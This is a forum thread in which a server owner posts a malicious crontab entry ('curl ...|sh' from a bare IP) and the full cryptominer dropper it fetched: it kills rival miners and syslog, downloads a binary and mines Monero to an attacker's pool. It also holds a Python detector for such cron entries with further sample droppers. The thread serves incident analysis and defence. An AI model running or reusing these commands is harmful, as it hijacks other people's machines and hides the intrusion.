1
Symo OP Found the problem. The crontab contains this line:
`curl http://194.87.239.7/common/logo.jpg|sh`

The downloaded file looks like this:

```sh
#!/bin/sh
# clean up leftovers from earlier versions / competing droppers
rm -rf /tmp/index_bak.*
rm -rf /tmp/httpd.conf.*
rm -rf /tmp/httpd.conf
# kill competing miners by wallet address and by common miner/pool names
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
# kill local logging as well
pkill rsyslog
pkill syslog
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
# is our own miner (identified by its wallet address) already running?
ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
if [ $? -ne 0 ]
then
    echo "start process....."
    # pick the AES-NI build if the CPU advertises the aes flag, else the fallback build
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
    then
        curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
        wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
    else
        curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
        wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
    fi
    chmod +x /tmp/cputest
    # launch the miner against the attacker's pool with the attacker's wallet
    nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
else
    echo "runing....."
fi
```

What is this script meant to do?
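The crontab entry the OP found (`curl <url>|sh`) is the persistence mechanism here, and it is also the easiest thing to check for on other hosts. The script below is an added example, not code from the thread; it scans crontab text for the patterns that dropper entries tend to share: a download piped straight into an interpreter, a payload written to a temp directory and made executable, and a URL that uses a bare IP address instead of a hostname. The sample crontab is constructed for the example; the flagged `curl ... |sh` line uses the URL from the OP's post, the other entries are invented, and `203.0.113.5` and `updates.example.invalid` are placeholder values.

```python
"""Flag download-and-execute entries in crontab text.

Added example for this thread (not the original post's code). Run it against
the output of `crontab -l`, `crontab -l -u <user>`, or the files under
/etc/cron.d to find entries like the one the OP found.
"""
import re
from dataclasses import dataclass

# Downloaders and interpreters whose pairing through a pipe is the tell.
DOWNLOADERS = r"(?:curl|wget|fetch)\b"
INTERPRETERS = r"(?:sh|bash|dash|zsh|python[0-9.]*|perl)\b"

# "curl URL | sh", "wget -qO- URL | bash", with an optional sudo in front of the shell.
PIPE_TO_SHELL = re.compile(DOWNLOADERS + r"[^|;&]*\|\s*(?:sudo\s+)?" + INTERPRETERS)
# "curl -o /tmp/x URL ... chmod +x": payload dropped in a temp dir and made executable.
DROP_AND_RUN = re.compile(
    r"(?:curl|wget)\b[^|;&]*\s(?:/tmp|/dev/shm|/var/tmp)/\S+.*chmod\s+\+x"
)
# A bare IPv4 address in the URL is common in droppers and rare in admin jobs.
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")


@dataclass
class Finding:
    lineno: int      # 1-based line number within the scanned text
    line: str        # the crontab entry as written
    reasons: list    # human-readable reasons it was flagged


def scan_crontab(text: str) -> list:
    """Return a Finding for every non-comment line matching a dropper pattern."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if PIPE_TO_SHELL.search(line):
            reasons.append("remote download piped into an interpreter")
        if DROP_AND_RUN.search(line):
            reasons.append("payload dropped to a temp directory and executed")
        if IP_URL.search(line):
            reasons.append("URL uses a bare IP address")
        if reasons:
            findings.append(Finding(lineno, line, reasons))
    return findings


# Constructed sample crontab: two benign jobs plus three entries that should be flagged.
# Line 4 is the entry from the OP's post; lines 5 and 6 are invented with placeholder hosts.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/10 * * * * curl http://194.87.239.7/common/logo.jpg|sh
@reboot wget -qO- https://updates.example.invalid/agent.sh | bash
@hourly curl -s -o /tmp/.x http://203.0.113.5/x && chmod +x /tmp/.x && /tmp/.x
30 2 * * * /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.lineno}: {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host, feed it every crontab that can run code: each user's `crontab -l` output, `/etc/crontab`, the files in `/etc/cron.d`, and the per-user spool under `/var/spool/cron`. A hit on a line like the OP's should be treated as an indicator of compromise rather than something to simply delete, since the same access that wrote the cron entry may have left other persistence behind.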
2
ryd994 2017-04-06 10:30:09 +08:00 via Android
Hahaha, that's ruthless: first kill everyone else's mining software,
then start your own.
3
xss 2017-04-06 10:31:18 +08:00
A cryptomining trojan....
4
holyzhou 2017-04-06 10:51:00 +08:00
Can I just say this script is really ugly.
5
mingl0280 2017-04-06 12:27:45 +08:00
Mining trojan 233333
6
expy 2017-04-06 12:44:26 +08:00
Competitors are the real enemy; naming it cputest is clever too 233
7
AlisaDestiny 2017-04-06 13:13:43 +08:00
Really learned something. What I'm curious about is how this cron task got written in there.
8
kmahyyg 2017-04-06 13:16:25 +08:00 via Android
#3 has it right